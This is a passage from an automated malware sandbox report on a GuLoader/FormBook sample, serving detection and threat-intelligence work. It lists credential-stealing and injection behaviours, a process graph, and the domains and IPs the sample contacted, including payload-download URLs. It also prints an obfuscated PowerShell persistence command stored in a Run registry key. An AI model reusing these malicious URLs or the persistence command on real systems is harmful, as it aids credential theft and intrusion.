        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B3

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		11
        Deobfuscate/Decode Files or Information        		1
        OS Credential Dumping        		3
        File and Directory Discovery        		Remote Services1
        Archive Collected Data        		3
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Shared Modules        		1
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory15
        System Information Discovery        		Remote Desktop Protocol1
        Data from Local System        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter        		Logon Script (Windows)1
        Access Token Manipulation        		3
        Obfuscated Files or Information        		Security Account Manager121
        Security Software Discovery        		SMB/Windows Admin Shares1
        Email Collection        		4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook512
        Process Injection        		1
        Software Packing        		NTDS2
        Process Discovery        		Distributed Component Object Model1
        Clipboard Data        		5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Registry Run Keys / Startup Folder        		1
        DLL Side-Loading        		LSA Secrets31
        Virtualization/Sandbox Evasion        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
        Masquerading        		Cached Domain Credentials1
        Application Window Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Modify Registry        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
        Virtualization/Sandbox Evasion        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
        Process Injection        		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431789 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 51 www.n-benriya002.com 2->51 53 www.ejbodyart.com 2->53 55 4 other IPs or domains 2->55 81 Multi AV Scanner detection for domain / URL 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for URL or domain 2->85 87 5 other signatures 2->87 11 SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe 26 2->11         started        signatures3 process4 file5 45 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 11->45 dropped 47 C:\Users\user\...\Afvrgningernes.Ign37, ASCII 11->47 dropped 99 Suspicious powershell command line found 11->99 15 powershell.exe 20 11->15         started        signatures6 process7 file8 49 C:\Users\user\AppData\...\Overfondle.exe, PE32 15->49 dropped 65 Obfuscated command line found 15->65 67 Writes to foreign memory regions 15->67 69 Sample uses process hollowing technique 15->69 71 2 other signatures 15->71 19 Overfondle.exe 2 7 15->19         started        23 conhost.exe 15->23         started        25 cmd.exe 1 15->25         started        signatures9 process10 dnsIp11 57 kraljevikonaci.rs 195.252.110.253, 443, 49706 BEOTEL-AShttpwwwbeotelnetRS Serbia 19->57 89 Multi AV Scanner detection for dropped file 19->89 91 Machine Learning detection for dropped file 19->91 93 Maps a DLL or memory area into another process 19->93 27 rmGjiHyfWQcajCGtrYkAoHJJOdK.exe 19->27 injected 30 cmd.exe 1 19->30         started        signatures12 process13 signatures14 97 Found direct / indirect Syscall (likely to bypass EDR) 27->97 32 cmd.exe 13 27->32         started        35 conhost.exe 30->35         started        37 reg.exe 1 1 30->37         started        process15 signatures16 73 Tries to steal Mail credentials (via file / registry access) 32->73 75 Tries to harvest and steal browser information (history, passwords, etc) 32->75 77 Modifies the context of a thread in another process (thread injection) 32->77 79 2 other signatures 32->79 39 rmGjiHyfWQcajCGtrYkAoHJJOdK.exe 32->39 injected 43 firefox.exe 32->43         started        process17 dnsIp18 59 n-benriya002.com 219.94.128.41, 49712, 80 SAKURA-CSAKURAInternetIncJP Japan 39->59 61 www.jt-berger.store 217.160.0.183, 49708, 49709, 49710 ONEANDONE-ASBrauerstrasse48DE Germany 39->61 63 ejbodyart.com 112.175.50.218, 49707, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 39->63 95 Found direct / indirect Syscall (likely to bypass EDR) 39->95 signatures19

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe50%ReversingLabsWin32.Trojan.GuLoader
        SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe58%VirustotalBrowse
        SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Overfondle.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\Overfondle.exe50%ReversingLabsWin32.Trojan.GuLoader
        C:\Users\user\AppData\Local\Temp\Overfondle.exe61%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        ejbodyart.com1%VirustotalBrowse
        n-benriya002.com3%VirustotalBrowse
        www.jt-berger.store2%VirustotalBrowse
        kraljevikonaci.rs15%VirustotalBrowse
        www.ejbodyart.com0%VirustotalBrowse
        www.n-benriya002.com3%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://kraljevikonaci.rs/100%Avira URL Cloudmalware
        http://www.jt-berger.store/9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N10%Avira URL Cloudsafe
        https://kraljevikonaci.rs/ETfFmOW246.bin100%Avira URL Cloudmalware
        https://kraljevikonaci.rs/ETfFmOW246.bin5?100%Avira URL Cloudmalware
        http://www.jt-berger.store/9pdo/0%Avira URL Cloudsafe
        http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
        http://www.n-benriya002.com/9pdo/0%Avira URL Cloudsafe
        http://www.n-benriya002.com0%Avira URL Cloudsafe
        https://kraljevikonaci.rs/4%VirustotalBrowse
        https://kraljevikonaci.rs/ETfFmOW246.binY100%Avira URL Cloudmalware
        http://www.n-benriya002.com/9pdo/2%VirustotalBrowse
        http://www.ejbodyart.com/9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N10%Avira URL Cloudsafe
        https://kraljevikonaci.rs/ETfFmOW246.bin15%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        https://kraljevikonaci.rs/ETfFmOW246.bins100%Avira URL Cloudmalware
        http://www.jt-berger.store/9pdo/2%VirustotalBrowse
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
        http://www.n-benriya002.com3%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ejbodyart.com
        		112.175.50.218
        		truefalseunknown
        n-benriya002.com
        		219.94.128.41
        		truefalseunknown
        www.jt-berger.store
        		217.160.0.183
        		truefalseunknown
        kraljevikonaci.rs
        		195.252.110.253
        		truefalseunknown
        www.ejbodyart.com
        		unknown
        		unknowntrueunknown
        www.n-benriya002.com
        		unknown
        		unknowntrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://www.jt-berger.store/9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1false
        • Avira URL Cloud: safe
        		unknown
        https://kraljevikonaci.rs/ETfFmOW246.binfalse
        • 15%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://www.jt-berger.store/9pdo/false
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.n-benriya002.com/9pdo/false
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.ejbodyart.com/9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://duckduckgo.com/chrome_newtabcmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://duckduckgo.com/ac/?q=cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://kraljevikonaci.rs/ETfFmOW246.bin5?Overfondle.exe, 00000008.00000003.2065581113.0000000004487000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065735532.000000000447B000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2063617167.000000000448A000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2170621912.000000000448A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://kraljevikonaci.rs/Overfondle.exe, 00000008.00000003.2065621481.0000000004465000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.ftp.ftp://ftp.gopher.Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://www.n-benriya002.comrmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2616564781.0000000002DE1000.00000040.80000000.00040000.00000000.sdmpfalse
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://kraljevikonaci.rs/ETfFmOW246.binYOverfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.drfalse
                        		high
                        https://www.ecosia.org/newtab/cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://ac.ecosia.org/autocomplete?q=cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdOverfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://nsis.sf.net/NSIS_ErrorSecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, Overfondle.exe.2.drfalse
                                		high
                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdOverfondle.exe, 00000008.00000001.1889349329.00000000005F2000.00000020.00000001.01000000.0000000A.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://kraljevikonaci.rs/ETfFmOW246.binsOverfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2064998955.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          219.94.128.41
                                          		n-benriya002.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                          195.252.110.253
                                          		kraljevikonaci.rsSerbia
                                          		6700BEOTEL-AShttpwwwbeotelnetRSfalse
                                          217.160.0.183
                                          		www.jt-berger.storeGermany
                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                          112.175.50.218
                                          		ejbodyart.comKorea Republic of
                                          		4766KIXS-AS-KRKoreaTelecomKRfalse

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1431789
                                          Start date and time:2024-04-25 19:23:11 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 10m 17s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:17
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@17/13@4/4
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 87%
                                          • Number of executed functions: 85
                                          • Number of non-executed functions: 264
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 7656 because it is empty
                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          19:24:15API Interceptor44x Sleep call for process: powershell.exe modified
                                          19:25:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hakkebrttet %elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)
                                          19:25:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hakkebrttet %elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)
                                          19:26:11API Interceptor6x Sleep call for process: cmd.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          219.94.128.411704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          S#U0130PAR#U0130S_0433.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          zamowienie_002523.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • www.n-benriya002.com/9pdo/
                                          195.252.110.253179XakWwrt2H1Xx.exeGet hashmaliciousAgentTeslaBrowse
                                            REMITTANCE ADVICE IF01200022823418 Match 2024.exeGet hashmaliciousAgentTeslaBrowse
